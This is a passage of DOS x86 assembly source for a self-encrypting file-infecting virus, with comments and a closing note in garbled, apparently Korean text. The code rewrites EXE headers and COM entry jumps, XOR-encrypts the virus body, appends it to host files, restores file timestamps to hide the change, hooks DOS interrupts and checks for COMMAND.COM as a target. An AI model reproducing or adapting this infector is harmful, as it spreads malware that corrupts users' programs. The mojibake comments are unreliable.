mov word ptr EXE_HEADER[02h],dx
mov ax,START_POINT2
mov dx,START_POINT1
div PARAGRAPH
sub ax,word ptr EXE_HEADER[08h] ;╤Aöß¼a╖í╗a
mov word ptr EXE_HEADER[16h],ax ;cs
mov word ptr EXE_HEADER[0eh],ax ;ss
mov ax,BYTESIZE
add ax,GAJASIZE-2
mov word ptr EXE_HEADER[10h],ax ;sp
mov word ptr EXE_HEADER[14h],dx ;ip
add dx,16
sub dx,RANDOM
mov word ptr virus_body[01h],dx ;╤┴╖⌐╖ü »í╕b╕±╖i
add dx,HEADSIZE ;ëü¼e╨ü ┤q╤í╬üôe
mov word ptr si_value[01h],dx ;ªüªà╖ü si/diêt╡A
mov word ptr di_value[01h],dx ;╕ß╕w
write_header:
mov ax,4200h ;╤Aö߃i │eöa
xor cx,cx
xor dx,dx
pushf
call dword ptr cs:INT21_OFF
jc int_error1
mov ah,40h
mov cx,20h
mov dx,offset EXE_HEADER
pushf
call dword ptr cs:INT21_OFF
jc int_error1
jmp virus_to_buffer
com_process:
mov ax,word ptr FILE_SIZE[00] ;COM ╤┴╖⌐╖ü ╤Aö߃i
;╕ü ╕b┤≤╨eöa
add ax,0110h
sub ax,RANDOM
mov word ptr virus_body[01h],ax
add ax,HEADSIZE
mov word ptr si_value[01h],ax ;┤q╤í╬üôe ₧ü╦Ñ╡A
mov word ptr di_value[01h],ax ;si/di êt╖i ╗ó╕≤ │eöa
mov ax,word ptr FILE_SIZE[00]
sub ax,3
mov word ptr COM_START[01],ax ;COM ╤┴╖⌐╖ü
;╤Aößêa ña╖í£ß»aƒi
mov ax,4200h ;êaƒí╟íëA ╨eöa
xor cx,cx
xor dx,dx
pushf
call dword ptr cs:INT21_OFF
jc int_error1
mov ah,40h
mov cx,3
mov dx,offset COM_START
pushf
call dword ptr cs:INT21_OFF
jc int_error1
virus_to_buffer: ;┤q╤í╤┴ƒi ╨aïí ╢ß╨ü ┤aîa
;¼w║ü»í ╨iöw╨e òA╖í╚ß ºi£Γ
mov ax,SPACE_SEG ;╡A ña╖í£ß»aƒi ╖¬┤ß╡Ñöa
mov es,ax ;╖¬┤ß╡⌐ÿüôe │a¥Aïí ┼íùa 16êüƒi
;╢ü¼σ └ü╢üëí ïa ûß╡A ╢Ñ£ü
cld ;ña╖í£ß»aƒi └ü╢àöa
xor di,di
mov ax,9090h
mov cx,GAJASIZE/2 ;│a¥Aïí ┼íùa¥í 16ña╖í╦aƒi
;└ü╢àöa
rep stosw
xor si,si
;┤q╤í╤┴╨e ña╖í£ß»aƒi
mov cx,HEADSIZE ;╨iöw╡w╡b╡A
rep movsb ;│aïí╢ß╨e ┴íïí ╕b┤≤
mov cx,BODYSIZE
move_loop2:
lodsb
xor al,byte ptr key_value[01h]
stosb ;┤q╤í╤┴╨e ña╖í£ß»aƒi
;╨iöw╡w╡b╡A ╡½ïÑöa
loop move_loop2 ;(╡½ïííe¼ß ┤q╤í╤┴)
buffer_to_file:
;╨iöw╡w╡b╡A╖╢ôe ííùe Éü╢w╖i
;╤┴╖⌐¥í ╡½ïÑöa
mov bx,FILE_HANDLE ;öe Ée«ü¥í ╖Ñ╨ü ╡½ëa╗íôe
mov ax,4202h ;»í╕b╕±╖í │a¥Aïí ┼íùa
xor cx,cx ;16ña╖í╦a║ù ┤ßôa ╨eèàòAƒi
xor dx,dx ;êaƒa╟íëAûEöa
pushf
call dword ptr cs:INT21_OFF
mov cx,ALL_BYTE
mov dx,RANDOM
mov ax,es
mov ds,ax
mov ah,40h
pushf
call dword ptr cs:INT21_OFF
repair_date: ;Éi╝aƒi ╢Ñ£üöü¥í ò⌐¥a║àöa
mov ax,5701h
mov dx,cs:FILE_DATE
mov cx,cs:FILE_TIME
pushf
call dword ptr cs:INT21_OFF
int_error1:
retn
read_handle endp
;**************************************************************
;
;
; DATA AREA BLOCK
;
;
;**************************************************************
COM_START db 0e9h ;COM╤┴╖⌐╖ü ╕±╧a┼íùa
dw 0
PSP_SEG dw 0 ;PSP SEGMENT
EXE_SP dw 0fffeh ;EXE╖üSP
EXE_SS dw 0 ;EXE╖üSS
EXE_IP dw 0 ;EXE╖üIP
EXE_CS dw 0 ;EXE╖üCS
COM_IP dw 100h ;COM╖üIP
COM_CS dw 0 ;COM╖üCS
ENV_BLOCK db 12h dup (?) ;»⌐╨ù╖i ╢ß╨e ╤┼ëw ºi£Γ
ORG_PARA dw 0 ;╤e »⌐╨ù╤┴╖⌐╖ü ╨iöwûE ╠ü£ßïa£ü╧a«ü
SPACE_SEG dw 0 ;ña╖í£ß»a òA╖í╚ß╕b┤≤╢w ╨iöwºi£Γ
VIRUS_SEG dw 0 ;ña╖í£ß»a ¼w║ü╢w ╨iöw ¡Aïaáσ╦a
FILE_TYPE db 1 ;╤┴╖⌐ ╤w╚ü
INT1C_OFF dw 0 ;INT1C_OFF
INT1C_SEG dw 0 ;INT1C_SEG
INT24_OFF dw 0 ;INT24_OFF
INT24_SEG dw 0 ;INT24_SEG
INT21_OFF dw 0 ;INT21_OFF
INT21_SEG dw 0 ;INT21_SEG
ALL_BYTE dw BYTESIZE ;ña╖í£ß»a ÑÑ┴A╖ü ╟aïí
MARKER dw 0 ;╢σòí╢ü╢w ╤Aöß ╠eöe╢w
TARGET_FILE1 db 'COMM' ;COMMAND.COM ╤┬╖Ñ╢w
FILE_NAME dd 0 ;FILE_NAME ╕ß╕w
FILE_SIZE dd 0 ;FILE_SIZE ╕ß╕w
FILE_HANDLE dw 0 ;FILE_HANDLE ╕ß╕w
FILE_ATTR dw 0 ;FILE_ATTR ╤┴╖⌐¡ó¼≈
FILE_DATE dw 0 ;FILE_DATE Éi╝a
FILE_TIME dw 0 ;FILE_TIME »íêe
FILE_NAME_START dw 0 ;COLUMNS_OFF ╤┴╖⌐╖íƒq »í╕b╕±
START_POINT2 dw 0 ;╤┴╖⌐ áàáa╗íáb ña╖í£ß»aêa ª¢╖ië╡(╨a╢ß)
START_POINT1 dw 0 ; // (¼w╢ß)
EXE_HEADER db 40h dup (0) ;EXE_HEADER
PARAGRAPH dw 0016 ;PARAGRAPH
SECTOR dw 0512 ;SECTOR
RANDOM dw 0 ;Ée«üêt1
STACK_SPACE dw 32 dup (?)
finish label byte
main ends
stac segment para stack 'stack'
db 100 dup (0)
stac ends
end start
;┬ü»Ñ : ┤üëíëí.. ¼Θíwáe ╕ΓôeòAòí ╖í£²ëA »íêe╖í ág╖í êΘƒíöaôí.
ña╖í£ß»a ╡eèü╨a»íôe ªàùi └q╣íáe ╨a¡A╢a. ╢Ñ£ü ╨q«ü╤┴ ╨ü¼ß
öa CALL╨ü¼ß │a¥aëí ╨eêσòA ña½aëA áeùiöa Ñíôí ïa£²ëA ûV»sôíöa.
╖í ña╖í£ß»aƒi áeùi«ü ╖╢ëA òí╢æ╖i║à ╡A₧ü¼i¥Q/öa╟a┤ßÑE╣a/╧í╧í
DIR-II ña╖í£ß»aƒi áeùa»Ñ ╨ü─ßùi╡AëA êq¼a ùaƒ│ôíöa.
╖íê⌡╖í èé¼e ña╖í£ß»a¥í░ß íyñσ╝ü╖Ñ╗í ííƒaëV╗íáe ╡a╕σ╙í ïí«ë╖í
┤a╗ó╖e ÿi¥a¼ß ╥Bïí╕Γ╖Ñê⌡╖e ┤eÉa╡íæA╢a. ╖í£²ëA ╕≈Ñíƒi ë╖╖A╨ü┤í
ág╖e ña╖í£ß»aêa Éa╡⌐╔EòA.
┤aóü╜í¥ó ┤ß¡Q╡e»s ág╖í╨a¡A╢a ña╖í£ß»a ág╟q ╤┬»⌐╨e ï⌐òí ┤⌠╖aôí
îa╢a